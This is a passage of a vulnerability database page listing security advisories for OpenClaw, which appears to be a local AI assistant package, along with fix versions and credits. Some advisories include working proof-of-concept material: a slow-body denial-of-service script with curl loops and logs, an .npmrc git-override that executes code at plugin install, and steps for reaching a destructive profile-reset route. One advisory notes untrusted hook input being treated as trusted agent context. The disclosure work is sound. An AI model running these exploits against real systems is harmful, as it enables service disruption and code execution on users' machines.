OpenClaw: Gateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation ## Summary Gateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: v2026.3.28 rotates device tokens without disconnecting already-authenticated WebSocket sessions, which is a real but post-compromise revocation gap. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `91f7a6b0fd67b703897e6e307762d471ca09333d` — 2026-03-31T09:05:34+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zsxsoft for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-z7wa-tw2t-vqas
Aliases: CVE-2026-41388 GHSA-3pm9-5j7m-59vc |
OpenClaw: Tlon Startup Migration Rehydrates Empty-Array Revocations From File Config ## Summary Tlon Startup Migration Rehydrates Empty-Array Revocations From File Config ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: v2026.3.28 startup migration still treats empty-array settings as missing and can rehydrate revoked Tlon config from file state after restart. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `a4d72a83f01fedd35964c352e3473c7712a3511b` — 2026-03-31T14:57:03+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-z8mj-pnbe-wqej
Aliases: CVE-2026-41912 GHSA-vr5g-mmx7-h897 |
OpenClaw has Browser SSRF Policy Bypass via Interaction-Triggered Navigation ## Impact Browser SSRF Policy Bypass via Interaction-Triggered Navigation. Browser interactions could trigger navigations that bypassed the normal SSRF navigation checks. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.5` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @ccreater222 and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-zac2-wjyt-27af
Aliases: CVE-2026-41379 GHSA-3q42-xmxv-9vfr |
OpenClaw: Gateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send ## Summary Gateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real shipped operator.write to admin-class Talk Voice config persistence bug, but it is the same narrow authenticated persistence class and should be normalized below high. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `e34694733fc64931ed4a543c73d84ad3435d5df1` — 2026-03-25T19:55:26Z ## Release Process Note - The fix is already present in released version `2026.3.28`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zpbrent for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-zb5t-hhkm-kfeh
Aliases: CVE-2026-41369 GHSA-cg7q-fg22-4g98 |
OpenClaw: Host exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables ## Summary Host exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables ## Current Maintainer Triage - Normalized severity: medium - Assessment: v2026.3.28 also misses the broader package, registry, compiler, Docker, and TLS env family in the shipped host-env policy, and the unreleased main fix means this is a real medium-severity open issue. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `eb8de6715f02949c21c4e895fffc8a6dcb00975c` — 2026-03-31T19:37:43+09:00 OpenClaw thanks @tdjackey for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-zf3q-78js-k7ce
Aliases: GHSA-jccr-rrw2-vc8h |
OpenClaw safeBins jq `$ENV` filter bypass allows environment variable disclosure ## Summary The jq safe-bin policy blocked explicit `env` usage but still allowed jq programs that accessed environment data through `$ENV`. ## Impact An operator-approved safe-bin jq command could disclose environment variables that the safe-bin policy was supposed to keep out of scope. ## Affected Component `src/infra/exec-safe-bin-semantics.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `78e2f3d66d` (`Exec: tighten jq safe-bin env checks`). Thanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-zg68-u5b5-vkft
Aliases: CVE-2026-43534 GHSA-7g8c-cfr3-vqqr |
OpenClaw: Agent hook events could enqueue trusted system events from unsanitized external input ## Summary Agent hook events could enqueue trusted system events from unsanitized external input. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Agent hook dispatch could turn externally supplied hook metadata into trusted system events, allowing untrusted input to enter the agent as higher-trust context. ## Technical Details The fix sanitizes hook names and marks agent hook system events as untrusted before enqueueing them. ## Fix The issue was fixed in #64372. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `e3a845bde5b54f4f1e742d0a51ba9860f9619b29` - PR: #64372 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-zkum-rn42-yyfs
Aliases: CVE-2026-41381 GHSA-cqgw-44wg-44rf |
OpenClaw: Discord voice manager bypasses channel-level member access allowlist ## Summary Discord voice manager bypasses channel-level member access allowlist ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still accepts Discord voice ingress before channel allowlist authorization, and main-only gating means this remains a real shipped access-control bug. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zsxsoft for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-zpte-tgt5-wqcm
Aliases: CVE-2026-42439 GHSA-rj2p-j66c-mgqh |
OpenClaw: Browser tabs action select and close routes bypassed SSRF policy ## Summary Browser tabs action select and close routes bypassed SSRF policy. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The browser `/tabs/action` select and close branches could operate on targets without enforcing configured browser SSRF policy, weakening tab-level navigation protections. ## Technical Details The fix enforces browser SSRF policy in the select and close tab-action branches. ## Fix The issue was fixed in #63332. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `48c0347921b7e9438af0312968fc360ca88023f3` - PR: #63332 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @tdjackey for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-zu4s-jnn3-1kd8
Aliases: CVE-2026-43584 GHSA-vfp4-8x56-j7c5 |
OpenClaw: Exec environment denylist missed high-risk interpreter startup variables ## Summary Exec environment denylist missed high-risk interpreter startup variables. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The exec environment policy missed interpreter startup variables such as `VIMINIT`, `EXINIT`, `LUA_INIT`, and `HOSTALIASES`, allowing operator-supplied environment overrides to influence downstream execution or network behavior. ## Technical Details The fix expands the host environment security policy denylist to cover these and related high-risk environment variables, with regression coverage. ## Fix The issue was fixed in #63277. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `2d126fc62343a7b6895351f96e4e1474bc358140` - PR: #63277 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-zunq-wnnf-k3fw
Aliases: CVE-2026-42422 GHSA-whf9-3hcx-gq54 |
## Impact OpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing. Device token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= v2026.04.01` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting. |
Affected by 60 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-26sv-grsd-abcw | Duplicate Advisory: OpenClaw's message tool media parameter bypasses tool policy filesystem isolation ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-v8wv-jg3q-qwpq. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.24 contains a sandbox bypass vulnerability in the message tool that allows attackers to read arbitrary local files by using mediaUrl and fileUrl alias parameters that bypass localRoots validation. Remote attackers can exploit this by routing file requests through unvalidated alias parameters to access files outside the intended sandbox directory. |
GHSA-3gr8-2752-h46q
|
| VCID-384t-z1h8-pfft | OpenClaw: `browser.request` still allows `POST /reset-profile` through the `operator.write` surface > Fixed in OpenClaw 2026.3.24, the current shipping release. # Title `browser.request` still allows `POST /reset-profile` through the `operator.write` surface in OpenClaw `v2026.3.22` after `GHSA-vmhq-cqm9-6p7q` ## Severity Assessment High CWE: - `CWE-863: Incorrect Authorization` Proposed CVSS v3.1: - `8.1` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H`) An authenticated caller who only has access to the scoped Gateway method `browser.request` on the `operator.write` surface can still reach a destructive persistent-profile management route. Likely related advisory family: - `GHSA-vmhq-cqm9-6p7q` This should be treated as a later-version residual or incomplete fix. The earlier fix blocked `POST /profiles/create` and profile deletion, but the latest released `v2026.3.22` code still omits `POST /reset-profile` from the same mutation gate. ## Impact A caller with `operator.write` access to `browser.request` can still trigger persistent profile reset via `POST /reset-profile`. This crosses the intended privilege boundary for browser profile management because the release already attempts to block adjacent persistent profile mutations on this same surface. In practice, the allowed route reaches destructive behavior that can: - stop the running browser for that profile - close the Playwright browser connection for that profile - move the profile's local `userDataDir` to Trash when it exists This is a real integrity and availability impact on persistent browser state, not a route-classification mismatch with no side effects. ## Affected Component Product: - `openclaw` Tested latest released version: - release tag: `v2026.3.22` - release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a` Published artifact for that release: - package: `openclaw-2026.3.22.tgz` - package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0` - package build-info timestamp: `2026-03-23T10:56:05.946Z` Exact vulnerable paths on the shipped tag: - `src/gateway/method-scopes.ts:114` - `browser.request` is placed on the `operator.write` surface - `src/gateway/server-methods/browser.ts:155-165` - requests are only denied when `isPersistentBrowserProfileMutation(method, path)` returns true - `src/browser/request-policy.ts:19-25` - the mutation classifier recognizes `POST /profiles/create` and `DELETE /profiles/:name`, but not `POST /reset-profile` - `src/browser/routes/basic.ts:161-170` - the browser server exposes `POST /reset-profile` - `src/browser/server-context.reset.ts:37-63` - `resetProfile()` stops the browser, closes the connection, and moves the local profile directory to Trash when present - `src/node-host/invoke-browser.ts:240-243` - the same route-classification helper is reused in the browser proxy path when profile restrictions are active Relevant regression coverage gap on the shipped tag: - `src/gateway/server-methods/browser.profile-from-body.test.ts:104-140` - tests only block `POST /profiles/create` and `DELETE /profiles/:name` - there is no equivalent deny case for `POST /reset-profile` Published artifact evidence for the exact released package: - `openclaw-2026.3.22.tgz::package/dist/build-info.json` - `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11469-11525` - `openclaw-2026.3.22.tgz::package/dist/gateway-cli-Cxz4pSoJ.js:11484-11485` - `openclaw-2026.3.22.tgz::package/dist/request-policy-nIRryZwZ.js:9-12` - `openclaw-2026.3.22.tgz::package/dist/routes-CdaHRCET.js:6874-6889` Important release note: - the published package build-info commit differs from the release tag target commit - for this issue, the relevant authorization and route behavior was cross-checked in both the shipped tag source and the published package bundle, and it matches semantically on the vulnerable path ## Technical Reproduction A direct control/exploit pair can be reproduced against the latest released version. Preconditions: - use `openclaw@2026.3.22` - authenticate as a caller that has access to the scoped Gateway method `browser.request` - keep that caller on `operator.write`, not `operator.admin` - ensure the target local browser profile exists Reproduction steps: 1. Call `browser.request` with: - `method: "POST"` - `path: "/profiles/create"` - `body: { "name": "poc-profile" }` 2. Observe the control case is rejected with: - `browser.request cannot create or delete persistent browser profiles` 3. Call `browser.request` again with: - `method: "POST"` - `path: "/reset-profile"` - `body: { "profile": "poc-profile", "name": "poc-profile" }` 4. Observe that the exploit case is not rejected by the same handler. 5. Observe that the request is forwarded to the browser route/dispatcher, rather than being denied by the mutation classifier. 6. Observe that the reset route succeeds and applies profile reset behavior. Why this happens in the released code: - the release tries to gate persistent profile mutation using `isPersistentBrowserProfileMutation(...)` - that helper does not classify `POST /reset-profile` as a protected mutation - the exposed browser server route still maps `/reset-profile` to `profileCtx.resetProfile()` - `resetProfile()` performs state-changing behavior on the selected local profile ## Demonstrated Impact The shipped release shows the following behavior difference: Control case: - `POST /profiles/create` - rejected before the request is dispatched to the browser control path Exploit case: - `POST /reset-profile` - not classified as a blocked mutation - remains reachable through the `browser.request` surface - reaches `resetProfile()`, which performs destructive profile-management operations The reached route has concrete side effects: - stops the running browser if active - closes the Playwright browser connection - moves the profile's local `userDataDir` to Trash if it exists This is therefore a concrete authorization and policy gap on a real destructive profile-management route. It is not a complaint about the existence of `browser.request` by itself. ## Environment Environment used for validation: - product: `openclaw` - latest released version: `2026.3.22` - release tag: `v2026.3.22` - release tag target commit (peeled tag): `e7d11f6c33e223a0dd8a21cfe01076bd76cef87a` - published package: `openclaw-2026.3.22.tgz` - published package build-info commit: `4dcc39c25c6cc63fedfd004f52d173716576fcf0` Explicit trust-model statement: - this report does **not** rely on adversarial or mutually untrusted operators sharing one gateway host or config Scope check: - this is **not** a complaint about the existence of the explicit `browser.request` surface by itself - this is **not** a prompt-injection-only report - this is **not** a multi-tenant shared-gateway claim - this is **not** an attack on the unscoped HTTP compatibility endpoints - this is a concrete missed route inside an intended privilege gate on a real scoped Gateway method - the control case proves the policy is intended to exist on this surface, and the exploit case proves `POST /reset-profile` remains outside that gate in the shipped release ## Remediation Advice Recommended fix: 1. Extend the persistent-profile mutation classifier to include `POST /reset-profile`. 2. Reuse the same centralized route classification everywhere the release currently relies on `isPersistentBrowserProfileMutation(...)`, including: - `src/gateway/server-methods/browser.ts` - `src/node-host/invoke-browser.ts` 3. Add regression coverage with both: - a deny control for `POST /reset-profile` on the lower-privilege `browser.request` surface - an allow control for non-mutating browser profile reads 4. Review nearby profile-management routes for any other state-changing endpoints that are still omitted from the mutation classifier. 5. Treat `GHSA-vmhq-cqm9-6p7q` as the prior family and close the remaining residual route in the same policy surface. |
CVE-2026-35653
GHSA-xp9r-prpg-373r |
| VCID-9jjv-aa8k-rke1 | OpenClaw's message tool media parameter bypasses tool policy filesystem isolation ## Summary The message tool accepted `mediaUrl` and `fileUrl` aliases without applying the same sandbox localRoots validation as the canonical media path handling. ## Impact A caller constrained to sandbox media roots could read arbitrary local files by routing them through the alias parameters. ## Affected Component `src/infra/outbound/message-action-params.ts, src/infra/outbound/message-action-runner.ts` ## Fixed Versions - Affected: `< 2026.3.24` - Patched: `>= 2026.3.24` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `1d7cb6fc03` (`fix: close sandbox media root bypass for mediaUrl/fileUrl aliases`). OpenClaw thanks @AntAISecurityLab for reporting. |
CVE-2026-33581
GHSA-v8wv-jg3q-qwpq |
| VCID-9pj9-7b12-jbea | OpenClaw has incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant) > Fixed in OpenClaw 2026.3.24, the current shipping release. # Advisory Details **Title**: Incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant) **Description**: ### Summary The patch for CVE-2026-32011 tightened pre-auth body parsing limits (from 1MB/30s to 64KB/5s) across several webhook handlers. However, the **Feishu extension's webhook handler** was not included in the patch and still accepts request bodies with the old permissive limits (1MB body, 30-second timeout) **before** verifying the webhook signature. An unauthenticated attacker can exhaust server connection resources by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint. ### Details In `extensions/feishu/src/monitor.ts`, the webhook HTTP handler uses `installRequestBodyLimitGuard` with permissive limits at lines 276-278: ```typescript const FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024; // 1MB (line 26) const FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000; // 30s (line 27) // ... in monitorWebhook(), line 276-278: const guard = installRequestBodyLimitGuard(req, res, { maxBytes: FEISHU_WEBHOOK_MAX_BODY_BYTES, // 1MB timeoutMs: FEISHU_WEBHOOK_BODY_TIMEOUT_MS, // 30s responseFormat: "text", }); ``` The body guard is installed at line 276 **before** the request reaches the Lark SDK's `adaptDefault` webhook handler (line 284), which performs signature verification. This means: 1. Any unauthenticated HTTP POST is accepted 2. The server waits up to 30 seconds for the body to arrive 3. Each connection can buffer up to 1MB 4. Authentication only happens after the body is fully read The patched handlers (Mattermost, MSTeams, Google Chat, etc.) now use tight pre-auth limits: ```typescript const PREAUTH_MAX_BODY_BYTES = 64 * 1024; // 64KB const PREAUTH_BODY_TIMEOUT_MS = 5_000; // 5s ``` The Feishu extension was missed because it resides in `extensions/feishu/` (a plugin workspace) rather than in the core `src/` directory. **Attack chain:** ``` [Attacker sends slow HTTP POST to /feishu/events] → Rate limit check: passes (under 120 req/min) → Content-Type check: application/json, passes → installRequestBodyLimitGuard(1MB, 30s): installed → Body trickles at 1 byte/sec for 30 seconds → × 50 concurrent connections = connection exhaustion → Legitimate Feishu webhook deliveries blocked ``` ### PoC **Prerequisites:** Docker installed. **Step 1:** Create a minimal test server reproducing the vulnerable body parsing: ```bash cat > /tmp/feishu_webhook_server.js << 'EOF' const http = require("http"); const VULN_TIMEOUT = 30_000; // Vulnerable: 30s (same as Feishu handler) const PATCH_TIMEOUT = 5_000; // Patched: 5s (what it should be) function bodyGuard(req, res, timeoutMs) { let done = false; const timer = setTimeout(() => { if (!done) { done = true; res.statusCode = 408; res.end("Request body timeout"); req.destroy(); } }, timeoutMs); req.on("end", () => { done = true; clearTimeout(timer); }); req.on("close", () => { done = true; clearTimeout(timer); }); } http.createServer((req, res) => { if (req.url === "/healthz") { res.end("OK"); return; } if (req.method !== "POST") { res.writeHead(405); res.end(); return; } const timeout = req.url === "/feishu/events" ? VULN_TIMEOUT : PATCH_TIMEOUT; console.log(`[${req.url}] +conn`); bodyGuard(req, res, timeout); res.on("finish", () => console.log(`[${req.url}] -conn`)); }).listen(3000, () => console.log("Listening on :3000")); EOF node /tmp/feishu_webhook_server.js & sleep 1 ``` **Step 2:** Verify the vulnerability — slow body holds connection for the full timeout: ```bash # Vulnerable endpoint: connection stays open for ~10 seconds (max 30s) time (echo -n '{"t":"'; sleep 10; echo '"}') | \ curl -s -o /dev/null -w "status: %{http_code}\n" \ -X POST http://localhost:3000/feishu/events \ -H "Content-Type: application/json" \ -H "Content-Length: 65536" \ --data-binary @- --max-time 35 # Patched endpoint: connection terminated after ~5s time (echo -n '{"t":"'; sleep 10; echo '"}') | \ curl -s -o /dev/null -w "status: %{http_code}\n" \ -X POST http://localhost:3000/patched/events \ -H "Content-Type: application/json" \ -H "Content-Length: 65536" \ --data-binary @- --max-time 35 ``` **Step 3:** Batch exploit — 10 concurrent slow connections: ```bash for i in $(seq 1 10); do (echo -n 'A'; sleep 15) | \ curl -s -o /dev/null -X POST http://localhost:3000/feishu/events \ -H "Content-Type: application/json" \ -H "Content-Length: 65536" \ --data-binary @- --max-time 35 & done wait ``` ### Log of Evidence **Exploit result (vulnerable /feishu/events):** ``` === Feishu Webhook Pre-Auth Slow-Body DoS === Target: localhost:3000/feishu/events Concurrent connections: 10 [conn-0] held open for 15.0s (15B sent) [SUCCESS] [conn-1] held open for 15.0s (15B sent) [SUCCESS] [conn-2] held open for 15.0s (15B sent) [SUCCESS] [conn-3] held open for 15.0s (15B sent) [SUCCESS] [conn-4] held open for 15.0s (15B sent) [SUCCESS] [conn-5] held open for 15.0s (15B sent) [SUCCESS] [conn-6] held open for 15.0s (15B sent) [SUCCESS] [conn-7] held open for 15.0s (15B sent) [SUCCESS] [conn-8] held open for 15.0s (15B sent) [SUCCESS] [conn-9] held open for 15.0s (15B sent) [SUCCESS] === Results === Connections held open (SUCCESS): 10/10 [SUCCESS] Pre-auth slow-body DoS confirmed! ``` **Control result (patched /patched/events with 5s timeout):** ``` === CONTROL: Patched Webhook Body Limits (64KB/5s) === Target: localhost:3000/patched/events [conn-0] RESET after 8.0s (8B) [conn-1] RESET after 8.0s (8B) ... [conn-9] RESET after 8.0s (8B) Avg connection hold time: 8.0s (5s timeout + stagger delay) ``` **Server-side Docker logs confirming the discrepancy:** ``` [feishu-vulnerable] +conn (active: 1) [feishu-vulnerable] +conn (active: 10) ← No disconnections during 15s attack [patched-control] +conn (active: 20) [patched-control] -conn after 5.0s (active: 19) ← ALL terminated at 5s [patched-control] -conn after 5.0s (active: 10) ``` ### Impact An unauthenticated attacker can cause a **Denial of Service** against any OpenClaw instance running the Feishu channel in webhook mode. The Feishu webhook endpoint must be publicly accessible for Feishu to deliver webhooks, so the attacker can directly target it. With ~50 concurrent slow HTTP connections (each trickling 1 byte/second), the attacker can: - Exhaust the server's connection handling capacity for 30 seconds per wave - Block legitimate Feishu webhook deliveries (messages not reaching the bot) - Consume up to 50MB of memory (50 × 1MB buffer) per attack wave The attack is trivial — it only requires sending slow HTTP POST requests. No valid Feishu webhook signature or any other credentials are needed. ### Affected products - **Ecosystem**: npm - **Package name**: openclaw - **Affected versions**: <= 2026.2.22 - **Patched versions**: None ### Severity - **Severity**: Medium - **Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L ### Weaknesses - **CWE**: CWE-400: Uncontrolled Resource Consumption ### Occurrences | Permalink | Description | | :--- | :--- | | [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27) | Permissive body limit constants: `FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024` (1MB) and `FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000` (30s) — should be 64KB/5s to match the CVE-2026-32011 patch. | | [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280) | `installRequestBodyLimitGuard` call in `monitorWebhook()` using the permissive constants — this guard runs before authentication (the Lark SDK handler at line 284). | |
CVE-2026-35665
GHSA-w6m8-cqvj-pg5v |
| VCID-brfj-4shr-qkgc | OpenClaw has an Arbitrary Malicious Code Execution Vulnerability > Fixed in OpenClaw 2026.3.24, the current shipping release. ### Summary During the installation phase of OpenClaw local plugins/hooks, the Git executable can be hijacked by a project-level .npmrc file, leading to arbitrary code execution during installation. ### Details Please note that the source code locations mentioned below are based on version openclaw-2026.3.13-1, but the issue has been confirmed to still exist in the current latest version, 2026.3.23. When installing a local plugin directory, local plugin archive, local hook pack directory, or local hook pack archive, OpenClaw first copies the source directory to a temporary `stageDir`, then executes the following in that directory: ``` npm install --omit=dev --silent --ignore-scripts ``` See `src/infra/install-package-dir.ts:176-199`. Since this process does not strip the project root `.npmrc`, and npm reads the project-level `.npmrc` during local project installation, an attacker could use a `.npmrc` file in a malicious plugin or hook directory to override npm’s `git` executable path. By leveraging a Git dependency, the attacker could trigger npm to call this malicious program, thereby executing arbitrary local code during the installation phase. **Affected Paths** - Plugin CLI entry point: `src/cli/plugins-cli.ts:199-255` - Hook CLI entry point: `src/cli/hooks-cli.ts:573-676` - Plugin local directory / archive installation: `src/plugins/install.ts:379-405`, `src/plugins/install.ts:541-565` - Hook local directory / archive installation: `src/hooks/install.ts:380-403`, `src/hooks/install.ts:443-470` - Actual execution of `npm install --ignore-scripts`: `src/infra/install-package-dir.ts:176-199` **Vulnerability Trigger Flow** 1. The user executes one of the following commands: - `openclaw plugins install <path-or-spec>` - `openclaw hooks install <path-or-spec>` 2. If the argument is a local directory or local archive, OpenClaw navigates to the local installation path. 3. OpenClaw copies the source directory to a temporary `stageDir`. See `src/infra/install-package-dir.ts:176-177`. 4. If `dependencies` are present in `package.json`, OpenClaw executes the following in `stageDir`: ``` npm install --omit=dev --silent --ignore-scripts ``` See `src/infra/install-package-dir.ts:188-199`. 5. npm reads the project-level `.npmrc` file in this directory. Official documentation: [`.npmrc`](https://docs.npmjs.com/cli/v11/configuring-npm/npmrc/) 6. If `.npmrc` is set to `git=<path to malicious program>` and there is a git dependency in the dependency tree, npm will invoke that `git` program when resolving the dependency. Official documentation: [`npm config git`](https://docs.npmjs.com/cli/v11/using-npm/config/) Git dependency documentation: [`package.json`](https://docs.npmjs.com/cli/v11/configuring-npm/package-json/) 7. Consequently, an attacker can execute arbitrary local programs during the plugin/hook installation phase without waiting for the plugin or hook to be loaded later. **Triggering Commands** - Plugin installation command: ``` openclaw plugins install <path-or-spec> ``` - Hook installation command: ``` openclaw hooks install <path-or-spec> ``` When `<path-or-spec>` is a local directory or local archive, it will be resolved to the path used by the `npm install --omit=dev --silent --ignore-scripts` command mentioned above. ### PoC Currently, `testpoc/` is a minimal PoC directory used to verify that “when installing local packages, OpenClaw enters the `npm install --ignore-scripts` path.” It is divided into two core sections: testpoc/pkg/ Purpose: Simulates the local package directory installed by `openclaw plugins install ...` or `openclaw hooks install ...` testpoc/repo/ Purpose: Simulates a Git dependency repository within the npm dependency tree Directory Structure testpoc/ ├─ pkg/ │ ├─ .npmrc │ ├─ package.json │ └─ sample-hook/ │ ├─ HOOK.md │ └─ handler.js └─ repo/ ├─ package.json └─ .git/... Function of Each Component testpoc/pkg/.npmrc Current content: git=calc.exe Function: Overrides npm’s Git executable configuration. Meaning: When npm encounters a git dependency during installation, it will not call the system git but will attempt to call the program specified here. This is the core trigger point of this PoC. See testpoc/pkg/.npmrc:1 testpoc/pkg/package.json Currently, this is a “mixed-use” manifest that includes both plugin and hook fields: { “name”: “probe-host”, “version”: “1.0.0”, “private”: true, “openclaw”: { “extensions”: [“./dist/index.js”], “hooks”: [“./sample-hook”] }, “dependencies”: { “probe-git-dep”: “git+file:///D:/AI Agent Source/OpenClaw/openclaw-2026.3.13-1/.testpoc/repo” } } Its functionality is divided into three layers: openclaw.extensions: Allows it to be validated as a plugin package openclaw.hooks: Enables it to be validated as a hook package The Git URL in dependencies: Forces npm to enter the Git dependency resolution path during installation See testpoc/pkg/package.json:1 testpoc/pkg/sample-hook/HOOK.md Purpose: To meet the minimum metadata requirements for a hook package. This is the key file that allows `openclaw hooks install pkg` to pass the pre-check. See testpoc/pkg/sample-hook/HOOK.md:1 testpoc/pkg/sample-hook/handler.js Current content: export default async function handler() { return { ok: true }; } Purpose: Meets the requirement that the hook directory must contain a handler entry file. It is not a usage point in itself; its sole purpose is to allow OpenClaw to proceed to the dependency installation phase. See testpoc/pkg/sample-hook/handler.js:1 testpoc/repo/package.json Current content: {“name”:“probe-git-dep”,‘version’:“1.0.0”} Purpose: Serves as the minimum repository content corresponding to a Git dependency. The focus is not on the repository code itself, but on the fact that “it is a Git repository,” allowing npm to perform Git-related operations on it. See testpoc/repo/package.json:1 testpoc/repo/.git/ Purpose: Makes testpoc/repo/ a real Git repository rather than a regular directory. When npm resolves git+file://... When installing dependencies, this is treated as the Git source. How the current PoC works If installing via hooks: openclaw hooks install testpoc/pkg The trigger chain is: OpenClaw identifies testpoc/pkg as the local hook package path Through pre-validation in openclaw.hooks, HOOK.md, and handler.js Proceeds to src/infra/install-package-dir.ts:188-199 Executes: npm install --omit=dev --silent --ignore-scripts npm reads testpoc/pkg/.npmrc npm processes the git dependency in package.json npm attempts to call the git=calc.exe specified in .npmrc ### Impact It is best described as an installation-time local command execution / unsafe package-install configuration issue. More precisely: OpenClaw installs local plugin and hook packs by running npm 